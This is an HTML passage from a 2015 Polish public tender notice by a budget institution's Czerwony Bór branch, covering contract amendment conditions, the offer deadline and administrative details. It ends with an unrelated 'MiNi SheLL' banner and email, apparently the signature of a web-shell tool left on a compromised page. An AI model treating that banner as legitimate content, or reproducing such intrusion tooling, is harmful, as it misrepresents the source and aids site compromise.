<p>2.	Strony przewidują możliwość wprowadzenia następujących zmian do Umowy:
1)	gdy z przyczyn niezależnych od Wykonawcy nie jest możliwe dostarczenie wskazanych w ofercie urządzeń  i zachodzi konieczność zastąpienia go innym, Zamawiający dopuszcza ich zmianę na spełniające wymagania określone w Umowie i załącznikach do Umowy, w szczególności na urządzenia tego samego producenta, pod warunkiem że zmiana wynika z faktu, że:
a)	producent zakończył produkcję,
b)	skończyła się dostępność urządzenia zaoferowanego przez Wykonawcę,
2)	w przypadku gdy nastąpiła zmiana przepisów prawa powszechnie obowiązującego, która ma wpływ na termin lub zakres realizacji przedmiotu Umowy,
3)	w przypadku, gdy niezbędne jest zmniejszenie zakresu przedmiotu Umowy z uwagi na decyzje podjęte przez Użytkownika lub organ go nadzorujący, w tym w szczególności zmniejszenie finansowania zadania,
4)	w przypadku wystąpienia Siły Wyższej</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pigbzamowieniapubliczne.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pomorska Instytucja Gospodarki Budżetowej POMERANIA z siedzibą w Czarnem 
ODDZIAŁ W CZERWONYM BORZE, Czerwony Bór 23,18-400 Łomża,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.09.2015 godzina 12:00, miejsce: Pomorska Instytucja Gospodarki Budżetowej POMERANIA z siedzibą w Czarnem 
ODDZIAŁ W CZERWONYM BORZE, Czerwony Bór 23,18-400 Łomża,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com